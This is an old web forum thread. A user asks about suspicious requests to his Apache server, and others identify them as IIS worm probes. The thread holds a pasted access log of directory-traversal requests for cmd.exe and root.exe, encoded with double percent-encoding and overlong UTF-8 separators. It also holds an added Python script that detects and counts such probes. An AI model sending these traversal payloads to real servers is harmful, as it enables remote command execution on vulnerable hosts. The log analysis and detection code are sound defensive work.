Posted: Sun Mar 24, 2002 10:03 am
by MikeJ
I had a recent h4x attack on my apache server. I would paste the access log, but when I removed apache I lost the log. It was someone making some very fishy GET requests to various Windows services (including the command line) not in my http docs folder. Being the overly cautious freak I am, I blocked port forwarding to port 80 on my router and took down my httpd indefinitely. I can still do stats, I suppose, but I'll have to upload them...
The IP seems to be a pacbell DSL user. It's the same subnet host fagpot (previous h4x0r of the ;0 channel) has, but I checked; it's not him.
*** Looking up 64.166.157.125
*** Resolved 64.166.157.125 to adsl-64-166-157-125.dsl.snfc21.pacbell.net
I'm probably overreacting, but better safe than sorry. I don't think my system was compromised.
Posted: Mon Mar 25, 2002 4:33 pm
by Lythium
lol.. dood, that's Code Red still in effect. All of my apache server logs are flooded with the cmd.exe and vti_private requests. It is nothing to worry about and does not affect apache. They are coming from a Pac Bell user because the worm attacks its local subnet. It gets spread to other subnets because people who visit an IIS-powered site spread it to the next IIS-powered site they go to. You have no worries of hax; if you want to cut out most of the spammed logs, block port 80 from everyone in your subnet.
Or, if you would like, I will donate shell space on irc.semicolon-zero.com for you to update.
Posted: Mon Mar 25, 2002 5:19 pm
by nemo
Group: admin
Posts: 133
Joined: Feb. 2002
congrats
Posted: Tue Mar 26, 2002 1:03 am
by MikeJ
congrats
:confused:
Posted: Tue Mar 26, 2002 1:10 am
by MikeJ
64.166.157.125 - - [24/Mar/2002:01:08:58 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
64.166.157.125 - - [24/Mar/2002:01:08:59 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 279
64.166.157.125 - - [24/Mar/2002:01:09:03 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:07 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 289
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
64.166.157.125 - - [24/Mar/2002:01:09:58 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
64.166.157.125 - - [24/Mar/2002:01:10:08 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 336
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:23 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
64.166.157.125 - - [24/Mar/2002:01:10:24 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286
64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:10:25 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
Well, thanks for the tips lyth, stats will be back up ASAP :D
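The log lines above show the worm's signature directly: requests for root.exe and winnt/system32/cmd.exe hidden behind double percent-encoding (%255c) and overlong UTF-8 separators (%c0%af, %c1%1c). The following is an added example, not code from anyone in this thread, that parses Apache common-log lines like those posted, normalizes the encoding tricks so the ../ traversal becomes visible, and counts worm probes per client so you can see whether a subnet block is worth it. The sample log is constructed here (the 10.0.0.7 entry is a made-up legitimate request for contrast).

```python
import re
from urllib.parse import unquote

# Constructed sample, modelled on the Apache common log lines posted in this thread.
SAMPLE_LOG = """\
64.166.157.125 - - [24/Mar/2002:01:08:58 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
64.166.157.125 - - [24/Mar/2002:01:09:08 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303
64.166.157.125 - - [24/Mar/2002:01:10:19 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
10.0.0.7 - - [24/Mar/2002:01:12:00 -0800] "GET /stats/index.html HTTP/1.0" 200 5120
"""

# Apache common log format: client ident user [time] "method target protocol" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Overlong UTF-8 byte pairs that the probes use in place of "/" and "\";
# after percent-decoding as Latin-1 they appear as these two-char strings.
OVERLONG_SEPARATORS = {"\xc0\xaf": "/", "\xc0\x2f": "/", "\xc1\x9c": "\\", "\xc1\x1c": "\\"}


def normalize_path(raw):
    """Decode percent-encoding twice (so %255c -> %5c -> \\), fold the overlong
    UTF-8 separator forms to real separators, and unify on "/" so traversal shows."""
    decoded = unquote(unquote(raw, encoding="latin-1"), encoding="latin-1")
    for seq, sep in OVERLONG_SEPARATORS.items():
        decoded = decoded.replace(seq, sep)
    return decoded.replace("\\", "/")


def classify(line):
    """Return (client_ip, normalized_path, is_worm_probe), or None if the line does not parse."""
    match = LOG_RE.match(line)
    if not match:
        return None
    ip, _ts, _method, target, _status, _size = match.groups()
    path = normalize_path(target.split("?", 1)[0]).lower()
    is_probe = "cmd.exe" in path or "root.exe" in path
    return ip, path, is_probe


def summarize(log_text):
    """Count worm probes per client IP; the keys are candidates for a block list."""
    counts = {}
    for line in log_text.splitlines():
        record = classify(line)
        if record and record[2]:
            counts[record[0]] = counts.get(record[0], 0) + 1
    return counts


if __name__ == "__main__":
    for ip, n in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {n} worm probes")
```

Every probe in the posted log returned 404 or 400, which is what Apache should do with a request for a Windows binary; the per-IP count is only there to show how concentrated the noise is before you decide on a subnet block.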
Posted: Thu Mar 28, 2002 11:15 pm
by Lythium
Block port 80 from 64.166.157.* and it'll almost be completely stopped.
Posted: Fri Mar 29, 2002 1:20 am
by JFK